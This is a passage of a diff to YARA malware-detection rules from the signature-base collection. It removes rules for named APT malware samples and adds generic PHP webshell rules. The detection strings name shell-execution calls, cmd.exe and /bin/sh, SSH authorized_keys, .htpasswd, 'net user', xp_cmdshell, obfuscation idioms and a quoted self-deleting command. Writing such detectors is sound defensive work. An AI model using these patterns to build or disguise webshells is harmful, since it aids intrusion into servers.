-		hash1 = "4b7b9c2a9d5080ccc4e9934f2fd14b9d4e8f6f500889bf9750f1d672c8724438"
+		importance = 70
 
 	strings:
-		$s1 = "c:\\windows\\ime\\setup.exe" fullword ascii
-		$s2 = "ws.run \"later.bat /start\",0Cet " fullword ascii
-		$s3 = "del later.bat" fullword ascii
-		$s4 = "mycrs.xls" fullword ascii
-		$a1 = "-el -s2 \"-d%s\" \"-p%s\" \"-sp%s\"" fullword ascii
-		$a2 = "<set ws=wscript.createobject(\"wscript.shell\")" fullword ascii
+		$dex1 = "dex\n0"
+		$dex2 = "dey\n0"
+		$pack = { 50 41 43 4b 00 00 00 02 00 }
+		$new_php2 = "<?php" nocase wide ascii
+		$new_php3 = "<script language=\"php" nocase wide ascii
+		$php_short = "<?"
+		$dynamic1 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(\$/ wide ascii
+		$dynamic2 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\("/ wide ascii
+		$dynamic3 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\('/ wide ascii
+		$dynamic4 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(str/ wide ascii
+		$dynamic5 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(\)/ wide ascii
+		$dynamic6 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(@/ wide ascii
+		$dynamic7 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(base64_decode/ wide ascii
+		$dynamic8 = "eval(" wide ascii
+		$gen_bit_sus1 = /:\s{0,20}eval}/ nocase wide ascii
+		$gen_bit_sus2 = /\.replace\(\/\w\/g/ nocase wide ascii
+		$gen_bit_sus6 = "self.delete"
+		$gen_bit_sus9 = "\"cmd /c" nocase
+		$gen_bit_sus10 = "\"cmd\"" nocase
+		$gen_bit_sus11 = "\"cmd.exe" nocase
+		$gen_bit_sus12 = "%comspec%" wide ascii
+		$gen_bit_sus13 = "%COMSPEC%" wide ascii
+		$gen_bit_sus18 = "Hklm.GetValueNames();" nocase
+		$gen_bit_sus19 = "http://schemas.microsoft.com/exchange/" wide ascii
+		$gen_bit_sus21 = "\"upload\"" wide ascii
+		$gen_bit_sus22 = "\"Upload\"" wide ascii
+		$gen_bit_sus23 = "UPLOAD" fullword wide ascii
+		$gen_bit_sus24 = "fileupload" wide ascii
+		$gen_bit_sus25 = "file_upload" wide ascii
+		$gen_bit_sus27 = "zuncomp" wide ascii
+		$gen_bit_sus28 = "ase6" wide ascii
+		$gen_bit_sus29 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" fullword wide ascii
+		$gen_bit_sus29b = "abcdefghijklmnopqrstuvwxyz234567" fullword wide ascii
+		$gen_bit_sus30 = "serv-u" wide ascii
+		$gen_bit_sus31 = "Serv-u" wide ascii
+		$gen_bit_sus32 = "Army" fullword wide ascii
+		$gen_bit_sus33 = /\$_(GET|POST|REQUEST)\["\w"\]/ fullword wide ascii
+		$gen_bit_sus34 = "Content-Transfer-Encoding: Binary" wide ascii
+		$gen_bit_sus35 = "crack" fullword wide ascii
+		$gen_bit_sus44 = "<pre>" wide ascii
+		$gen_bit_sus45 = "<PRE>" wide ascii
+		$gen_bit_sus46 = "shell_" wide ascii
+		$gen_bit_sus50 = "bypass" wide ascii
+		$gen_bit_sus52 = " ^ $" wide ascii
+		$gen_bit_sus53 = ".ssh/authorized_keys" wide ascii
+		$gen_bit_sus55 = /\w'\.'\w/ wide ascii
+		$gen_bit_sus56 = /\w\"\.\"\w/ wide ascii
+		$gen_bit_sus57 = "dumper" wide ascii
+		$gen_bit_sus59 = "'cmd'" wide ascii
+		$gen_bit_sus60 = "\"execute\"" wide ascii
+		$gen_bit_sus61 = "/bin/sh" wide ascii
+		$gen_bit_sus62 = "Cyber" wide ascii
+		$gen_bit_sus63 = "portscan" fullword wide ascii
+		$gen_bit_sus65 = "whoami" fullword wide ascii
+		$gen_bit_sus67 = "$password='" fullword wide ascii
+		$gen_bit_sus68 = "$password=\"" fullword wide ascii
+		$gen_bit_sus69 = "$cmd" fullword wide ascii
+		$gen_bit_sus70 = "\"?>\"." fullword wide ascii
+		$gen_bit_sus71 = "Hacking" fullword wide ascii
+		$gen_bit_sus72 = "hacking" fullword wide ascii
+		$gen_bit_sus73 = ".htpasswd" wide ascii
+		$gen_bit_sus74 = /\btouch\(\$[^,]{1,30},/ wide ascii
+		$gen_bit_sus99 = "$password = " wide ascii
+		$gen_bit_sus100 = "();$" wide ascii
+		$gen_much_sus7 = "Web Shell" nocase
+		$gen_much_sus8 = "WebShell" nocase
+		$gen_much_sus3 = "hidded shell"
+		$gen_much_sus4 = "WScript.Shell.1" nocase
+		$gen_much_sus5 = "AspExec"
+		$gen_much_sus14 = "\\pcAnywhere\\" nocase
+		$gen_much_sus15 = "antivirus" nocase
+		$gen_much_sus16 = "McAfee" nocase
+		$gen_much_sus17 = "nishang"
+		$gen_much_sus18 = "\"unsafe" fullword wide ascii
+		$gen_much_sus19 = "'unsafe" fullword wide ascii
+		$gen_much_sus24 = "exploit" fullword wide ascii
+		$gen_much_sus25 = "Exploit" fullword wide ascii
+		$gen_much_sus26 = "TVqQAAMAAA" wide ascii
+		$gen_much_sus30 = "Hacker" wide ascii
+		$gen_much_sus31 = "HACKED" fullword wide ascii
+		$gen_much_sus32 = "hacked" fullword wide ascii
+		$gen_much_sus33 = "hacker" wide ascii
+		$gen_much_sus34 = "grayhat" nocase wide ascii
+		$gen_much_sus35 = "Microsoft FrontPage" wide ascii
+		$gen_much_sus36 = "Rootkit" wide ascii
+		$gen_much_sus37 = "rootkit" wide ascii
+		$gen_much_sus38 = "/*-/*-*/" wide ascii
+		$gen_much_sus39 = "u\"+\"n\"+\"s" wide ascii
+		$gen_much_sus40 = "\"e\"+\"v" wide ascii
+		$gen_much_sus41 = "a\"+\"l\"" wide ascii
+		$gen_much_sus42 = "\"+\"(\"+\"" wide ascii
+		$gen_much_sus43 = "q\"+\"u\"" wide ascii
+		$gen_much_sus44 = "\"u\"+\"e" wide ascii
+		$gen_much_sus45 = "/*//*/" wide ascii
+		$gen_much_sus46 = "(\"/*/\"" wide ascii
+		$gen_much_sus47 = "eval(eval(" wide ascii
+		$gen_much_sus48 = "unlink(__FILE__)" wide ascii
+		$gen_much_sus49 = "Shell.Users" wide ascii
+		$gen_much_sus50 = "PasswordType=Regular" wide ascii
+		$gen_much_sus51 = "-Expire=0" wide ascii
+		$gen_much_sus60 = "_=$$_" wide ascii
+		$gen_much_sus61 = "_=$$_" wide ascii
+		$gen_much_sus62 = "++;$" wide ascii
+		$gen_much_sus63 = "++; $" wide ascii
+		$gen_much_sus64 = "_.=$_" wide ascii
+		$gen_much_sus70 = "-perm -04000" wide ascii
+		$gen_much_sus71 = "-perm -02000" wide ascii
+		$gen_much_sus72 = "grep -li password" wide ascii
+		$gen_much_sus73 = "-name config.inc.php" wide ascii
+		$gen_much_sus75 = "password crack" wide ascii
+		$gen_much_sus76 = "mysqlDll.dll" wide ascii
+		$gen_much_sus77 = "net user" wide ascii
+		$gen_much_sus80 = "fopen(\".htaccess\",\"w" wide ascii
+		$gen_much_sus81 = /strrev\(['"]/ wide ascii
+		$gen_much_sus82 = "PHPShell" fullword wide ascii
+		$gen_much_sus821 = "PHP Shell" fullword wide ascii
+		$gen_much_sus83 = "phpshell" fullword wide ascii
+		$gen_much_sus84 = "PHPshell" fullword wide ascii
+		$gen_much_sus87 = "deface" wide ascii
+		$gen_much_sus88 = "Deface" wide ascii
+		$gen_much_sus89 = "backdoor" wide ascii
+		$gen_much_sus90 = "r00t" fullword wide ascii
+		$gen_much_sus91 = "xp_cmdshell" fullword wide ascii
+		$gen_much_sus92 = "DEFACE" fullword wide ascii
+		$gen_much_sus93 = "Bypass" fullword wide ascii
+		$gen_much_sus94 = /eval\s{2,20}\(/ nocase wide ascii
+		$gen_much_sus100 = "rot13" wide ascii
+		$gen_much_sus101 = "ini_set('error_log'" wide ascii
+		$gen_much_sus102 = "base64_decode(base64_decode(" wide ascii
+		$gen_much_sus103 = "=$_COOKIE;" wide ascii
+		$gen_much_sus104 = { C0 A6 7B 3? 7D 2E 24 }
+		$gen_much_sus105 = "$GLOBALS[\"__" wide ascii
+		$gen_much_sus106 = ")-0)" wide ascii
+		$gen_much_sus107 = "-0)+" wide ascii
+		$gen_much_sus108 = "+0)+" wide ascii
+		$gen_much_sus109 = "+(0/" wide ascii
+		$gen_much_sus110 = "+(0+" wide ascii
+		$gen_much_sus111 = "extract($_REQUEST)" wide ascii
+		$gen_much_sus112 = "<?php\t\t\t\t\t\t\t\t\t\t\t" wide ascii
+		$gen_much_sus113 = "\t\t\t\t\t\t\t\t\t\t\textract" wide ascii
+		$gen_much_sus114 = "\" .\"" wide ascii
+		$gen_much_sus115 = "end($_POST" wide ascii
+		$weevely1 = /';\n\$\w\s?=\s?'/ wide ascii
+		$weevely2 = /';\x0d\n\$\w\s?=\s?'/ wide ascii
+		$weevely3 = /';\$\w{1,2}='/ wide ascii
+		$weevely4 = "str_replace" fullword wide ascii
+		$gif = { 47 49 46 38 }
+		$fp1 = "# Some examples from obfuscated malware:" ascii
+		$fp2 = "* @package   PHP_CodeSniffer" ascii
+		$fp3 = ".jQuery===" ascii
+		$fp4 = "* @param string $lstat encoded LStat string" ascii
+		$fp5 = "' => array('horde:"
+		$fp6 = "$messages['fileuploaderror'] = '"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and 2 of them
+		not ( uint16( 0 ) == 0x5a4d or uint32be( 0 ) == 0x3c3f786d or uint32be( 0 ) == 0x3c3f584d or $dex1 at 0 or $dex2 at 0 or $pack at 0 or uint16( 0 ) == 0x4b50 or 1 of ( $fp* ) ) and ( any of ( $new_php* ) or $php_short at 0 ) and ( any of ( $dynamic* ) ) and ( $gif at 0 or ( ( filesize < 1KB and ( 1 of ( $gen_much_sus* ) ) ) or ( filesize < 2KB and ( ( #weevely1 + #weevely2 + #weevely3 ) > 2 and #weevely4 > 1 ) ) or ( filesize < 4000 and ( 1 of ( $gen_much_sus* ) or 2 of ( $gen_bit_sus* ) ) ) or ( filesize < 20KB and ( 2 of ( $gen_much_sus* ) or 4 of ( $gen_bit_sus* ) ) ) or ( filesize < 50KB and ( 3 of ( $gen_much_sus* ) or 5 of ( $gen_bit_sus* ) ) ) or ( filesize < 100KB and ( 3 of ( $gen_much_sus* ) or 6 of ( $gen_bit_sus* ) ) ) or ( filesize < 160KB and ( 3 of ( $gen_much_sus* ) or 7 of ( $gen_bit_sus* ) or ( math.deviation ( 500 , filesize -500 , 89.0 ) > 70 ) ) ) or ( filesize < 500KB and ( 4 of ( $gen_much_sus* ) or 8 of ( $gen_bit_sus* ) or #gen_much_sus104 > 4 ) ) ) or ( filesize > 2KB and filesize < 1MB and ( ( math.entropy ( 500 , filesize -500 ) >= 5.7 and math.mean ( 500 , filesize -500 ) > 80 and math.deviation ( 500 , filesize -500 , 89.0 ) < 23 ) or ( math.entropy ( 500 , filesize -500 ) >= 7.7 and math.mean ( 500 , filesize -500 ) > 120 and math.mean ( 500 , filesize -500 ) < 136 and math.deviation ( 500 , filesize -500 , 89.0 ) > 65 ) ) ) )
 }
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_22 : FILE
-{
-	meta:
-		description = "Detects malware sample from Burning Umbrella report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "90c6cda9-95a0-5de7-b1cd-110c238d993d"
-		date = "2018-05-04"
-		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L378-L395"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "af2d7917f54ca365465383484b6d19a941d4801898d162a6d3afa7b7c8491a0f"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fa116cf9410f1613003ca423ad6ca92657a61b8e9eda1b05caf4f30ca650aee5"
-
-	strings:
-		$s1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\" ascii
-		$s3 = "Content-Disposition: form-data; name=\"txt\"; filename=\"" fullword ascii
-		$s4 = "Fail To Enum Service" fullword ascii
-		$s5 = "Host Power ON Time" fullword ascii
-		$s6 = "%d Hours %2d Minutes %2d Seconds " fullword ascii
 
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 4 of them
-}
-rule SIGNATURE_BASE_MAL_Airdviper_Sample_Apr18_1 : FILE
+rule SIGNATURE_BASE_WEBSHELL_PHP_Encoded_Big : FILE
 {
 	meta:
-		description = "Detects Arid Viper malware sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "00f118d1-be1c-5f50-a50f-591f824a1a53"
-		date = "2018-05-04"
-		modified = "2023-12-05"
+		description = "PHP webshell using some kind of eval with encoded blob to decode, which is checked with YARAs math.entropy module"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "c3bb7b8b-c554-5802-8955-c83722498f8b"
+		date = "2021-02-07"
+		modified = "2024-12-16"
 		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L398-L422"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L2347-L2433"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cbe1f36320eb9640ffbb6495faf7e5a062c5929d022bb56cbf0ebee810ef4e94"
-		score = 75
-		quality = 85
+		hash = "1d4b374d284c12db881ba42ee63ebce2759e0b14"
+		hash = "fc0086caee0a2cd20609a05a6253e23b5e3245b8"
+		hash = "b15b073801067429a93e116af1147a21b928b215"
+		hash = "74c92f29cf15de34b8866db4b40748243fb938b4"
+		hash = "042245ee0c54996608ff8f442c8bafb8"
+		logic_hash = "9c995f9c1c5e3a70dbb8170f6d1a2fba51c0f29184a5d3647016b520f4bfc0e3"
+		score = 50
+		quality = -75
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9f453f1d5088bd17c60e812289b4bb0a734b7ad2ba5a536f5fd6d6ac3b8f3397"
+		importance = 70
 
 	strings:
-		$x1 = "cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del \"%s\"" fullword ascii
-		$x2 = "daenerys=%s&" ascii
-		$x3 = "betriebssystem=%s&anwendung=%s&AV=%s" ascii
-		$s1 = "Taskkill /IM  %s /F &  %s" fullword ascii
-		$s2 = "/api/primewire/%s/requests/macKenzie/delete" fullword ascii
-		$s3 = "\\TaskWindows.exe" ascii
-		$s4 = "MicrosoftOneDrives.exe" fullword ascii
-		$s5 = "\\SeanSansom.txt" ascii
+		$new_php1 = /<\?=[\w\s@$]/ wide ascii
+		$new_php2 = "<?php" nocase wide ascii
+		$new_php3 = "<script language=\"php" nocase wide ascii
+		$php_short = "<?"
+		$cpayload1 = /\beval[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload2 = /\bexec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload3 = /\bshell_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload4 = /\bpassthru[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload6 = /\bpopen[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload7 = /\bproc_open[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload8 = /\bpcntl_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload9 = /\bassert[\n\t ]{0,500}\([^)0]/ nocase wide ascii
+		$cpayload10 = /\bpreg_replace[\n\t ]{0,500}\([^\)]{1,100}\/[ismxADSUXju]{0,11}(e|\\x65)/ nocase wide ascii
+		$cpayload12 = /\bmb_ereg_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
+		$cpayload13 = /\bmb_eregi_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
+		$cpayload20 = /\bcreate_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload21 = /\bReflectionFunction[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload22 = /fetchall\(PDO::FETCH_FUNC[\n\t ]{0,500}[,}\)]/ nocase wide ascii
+		$m_cpayload_preg_filter1 = /\bpreg_filter[\n\t ]{0,500}(\([^\)]|\/\*)/ nocase wide ascii
+		$m_cpayload_preg_filter2 = "'|.*|e'" nocase wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 6000KB and ( 1 of ( $x* ) or 4 of them )
+		filesize < 1000KB and ( any of ( $new_php* ) or $php_short at 0 ) and ( any of ( $cpayload* ) or all of ( $m_cpayload_preg_filter* ) ) and ( filesize > 2KB and ( math.entropy ( 500 , filesize -500 ) >= 5.7 and math.mean ( 500 , filesize -500 ) > 80 and math.deviation ( 500 , filesize -500 , 89.0 ) < 24 ) or ( math.entropy ( 500 , filesize -500 ) >= 7.7 and math.mean ( 500 , filesize -500 ) > 120 and math.mean ( 500 , filesize -500 ) < 136 and math.deviation ( 500 , filesize -500 , 89.0 ) > 65 ) )
 }
-rule SIGNATURE_BASE_MAL_Winnti_Sample_May18_1 : FILE
+rule SIGNATURE_BASE_WEBSHELL_PHP_Generic_Backticks : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report - Generic Winnti Rule"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c2f3339e-269f-5a51-8db6-06e54a707b3a"
-		date = "2018-05-04"
-		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L426-L440"
+		description = "Generic PHP webshell which uses backticks directly on user input"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b2f1d8d0-8668-5641-8ce9-c8dd71f51f58"
+		date = "2021-01-07"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L2435-L2483"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e235396de278120cbc4700f239c41e7f21e97ba111c07022ae505de540dda2bc"
+		hash = "339f32c883f6175233f0d1a30510caa52fdcaa37"
+		hash = "8db86ad90883cd208cf86acd45e67c03f994998804441705d690cb6526614d00"
+		hash = "af987b0eade03672c30c095cee0c7c00b663e4b3c6782615fb7e430e4a7d1d75"
+		hash = "67339f9e70a17af16cf51686918cbe1c0604e129950129f67fe445eaff4b4b82"
+		hash = "144e242a9b219c5570973ca26d03e82e9fbe7ba2773305d1713288ae3540b4ad"
+		hash = "8db86ad90883cd208cf86acd45e67c03f994998804441705d690cb6526614d00"
+		logic_hash = "faa064686a5632788497d0300ba017c3e564f3b70f07a01f2e49bf7c934feb28"
 		score = 75
-		quality = 85
+		quality = 44
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41"
+		importance = 70
 
 	strings:
-		$s1 = "wireshark" fullword wide
-		$s2 = "procexp" fullword wide
+		$backtick = /`\s*\{?\$(_POST\[|_GET\[|_REQUEST\[|_SERVER\['HTTP_)/ wide ascii
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		(( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and $backtick and filesize < 200
 }
-
-rule SIGNATURE_BASE_MAL_Visel_Sample_May18_1 : FILE
+rule SIGNATURE_BASE_WEBSHELL_PHP_Generic_Backticks_OBFUSC : FILE
 {
 	meta:
-		description = "Detects Visel malware sample from Burning Umbrella report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a244461a-380c-56e6-a891-131f6e13c280"
-		date = "2018-05-04"
-		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L442-L460"
+		description = "Generic PHP webshell which uses backticks directly on user input"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5ecb329f-0755-536d-8bfa-e36158474a0b"
+		date = "2021-01-07"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L2485-L2531"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3200e3224e037a116451b09ce265c1794a05406876376531ac81eb720fcb6945"
+		hash = "23dc299f941d98c72bd48659cdb4673f5ba93697"
+		hash = "e3f393a1530a2824125ecdd6ac79d80cfb18fffb89f470d687323fb5dff0eec1"
+		hash = "1e75914336b1013cc30b24d76569542447833416516af0d237c599f95b593f9b"
+		hash = "8db86ad90883cd208cf86acd45e67c03f994998804441705d690cb6526614d00"
+		logic_hash = "34354283762d6f62a4537e914d969f84546339da9be533e209d8738605b7e3ac"
 		score = 75
-		quality = 85
+		quality = 44
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "35db8e6a2eb5cf09cd98bf5d31f6356d0deaf4951b353fc513ce98918b91439c"
+		importance = 70
 
 	strings:
-		$s2 = "print32.dll" fullword ascii
-		$s3 = "c:\\a\\b.txt" fullword ascii
-		$s4 = "\\temp\\s%d.dat" wide
+		$s1 = /echo[\t ]{0,500}\(?`\$/ wide ascii
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.exports ( "szFile" ) or 2 of them )
+		filesize < 500 and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and $s1
 }
-rule SIGNATURE_BASE_ONHAT_Proxy_Hacktool : FILE
+rule SIGNATURE_BASE_WEBSHELL_PHP_By_String_Known_Webshell : FILE
 {
 	meta:
-		description = "Detects ONHAT Proxy - Htran like SOCKS hack tool used by Chinese APT groups"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cb18a5b0-dbbd-5dd3-af66-21b8302df6de"
-		date = "2016-05-12"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/p32Ozf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_onhat_proxy.yar#L8-L31"
+		description = "Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions."
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "05ac0e0a-3a19-5c60-b89a-4a300d8c22e7"
+		date = "2021-01-09"
+		modified = "2025-08-18"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L2533-L2669"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d8c088ecdedbd74ca174244c407c3bb27ccd082ec515c62ee19c93e0d45d3f3b"
-		score = 100
-		quality = 85
+		hash = "d889da22893536d5965541c30896f4ed4fdf461d"
+		hash = "10f4988a191774a2c6b85604344535ee610b844c1708602a355cf7e9c12c3605"
+		hash = "7b6471774d14510cf6fa312a496eed72b614f6fc"
+		hash = "decda94d40c3fd13dab21e197c8d05f48020fa498f4d0af1f60e29616009e9bf"
+		hash = "ef178d332a4780e8b6db0e772aded71ac1a6ed09b923cc359ba3c4efdd818acc"
+		hash = "a7a937c766029456050b22fa4218b1f2b45eef0db59b414f79d10791feca2c0b"
+		hash = "e7edd380a1a2828929fbde8e7833d6e3385f7652ea6b352d26b86a1e39130ee8"
+		hash = "0038946739956c80d75fa9eeb1b5c123b064bbb9381d164d812d72c7c5d13cac"
+		hash = "3a7309bad8a5364958081042b5602d82554b97eca04ee8fdd8b671b5d1ddb65d"
+		hash = "a78324b9dc0b0676431af40e11bd4e26721a960c55e272d718932bdbb755a098"
+		hash = "a27f8cd10cedd20bff51e9a8e19e69361cc8a6a1a700cc64140e66d160be1781"
+		hash = "9bbd3462993988f9865262653b35b4151386ed2373592a1e2f8cf0f0271cdb00"
+		hash = "459ed1d6f87530910361b1e6065c05ef0b337d128f446253b4e29ae8cc1a3915"
+		hash = "12b34d2562518d339ed405fb2f182f95dce36d08fefb5fb67cc9386565f592d1"
+		hash = "96d8ca3d269e98a330bdb7583cccdc85eab3682f9b64f98e4f42e55103a71636"
+		hash = "312ee17ec9bed4278579443b805c0eb75283f54483d12f9add7d7d9e5f9f6105"
+		hash = "15c4e5225ff7811e43506f0e123daee869a8292fc8a38030d165cc3f6a488c95"
+		hash = "0c845a031e06925c22667e101a858131bbeb681d78b5dbf446fdd5bca344d765"
+		hash = "d52128bcfff5e9a121eab3d76382420c3eebbdb33cd0879fbef7c3426e819695"
+		logic_hash = "8909bf77b7bacdae092fd7a94099224bf1660a6d341e113412e93f864298851b"
+		score = 70
+		quality = 17
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "30b2de0a802a65b4db3a14593126301e6949c1249e68056158b2cc74798bac97"
-		hash2 = "94bda24559713c7b8be91368c5016fc7679121fea5d565d3d11b2bb5d5529340"
-		hash3 = "a26e75fec3b9f7d5a1c3d0ce1e89e4b0befb7a601da0c69a4cf96301921771dd"
-		hash4 = "c202e9d5b99f6137c7c07305c7314e55f52bae832d460c44efc8f2a90ff03615"
-		hash5 = "dded62ad85c0bdd68bcc96f88d8ba42d5ad0ef999911ebdea3f561a4491ebbc6"
-		hash6 = "f0954774c91603fc2595f0ba0727b9af4e80f6f9be7bb629e7fb6ba4309ed4ea"
-		hash7 = "f3906be01d51e2e1ae9b03cd09702b6e0794b9c9fd7dc04024f897e96bb13232"
-		hash8 = "f65ae9ccf988a06a152f27a4c0d7992100a2d9d23d80efe8d8c2a5c9bd78a3a7"
-
-	strings:
-		$s1 = "INVALID PARAMETERS. TYPE ONHAT.EXE -h FOR HELP INFORMATION." fullword ascii
-		$s2 = "[ONHAT] LISTENS (S, %d.%d.%d.%d, %d) ERROR." fullword ascii
-		$s3 = "[ONHAT] CONNECTS (T, %d.%d.%d.%d, %d.%d.%d.%d, %d) ERROR." fullword ascii
-
-	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and ( 1 of ( $s* ) ) ) or ( 2 of them )
-}
-
-rule SIGNATURE_BASE_MAL_Exilerat_Feb19_1 : FILE
-{
-	meta:
-		description = "Detects Exile RAT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f0a510f3-5fea-59a7-8991-9d06dc478b2a"
-		date = "2019-02-04"
-		modified = "2023-12-05"
-		reference = "https://creativecommons.org/licenses/by-nc/4.0/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_exile_rat.yar#L4-L26"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0556bc0dbd33502d5bf823cf265a4e133d9af43076abe35a86cf5e20ab314e35"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		hash1 = "3eb026d8b778716231a07b3dbbdc99e2d3a635b1956de8a1e6efc659330e52de"
+		importance = 70
 
 	strings:
-		$x1 = "Content-Disposition:form-data;name=\"x.bin\"" fullword ascii
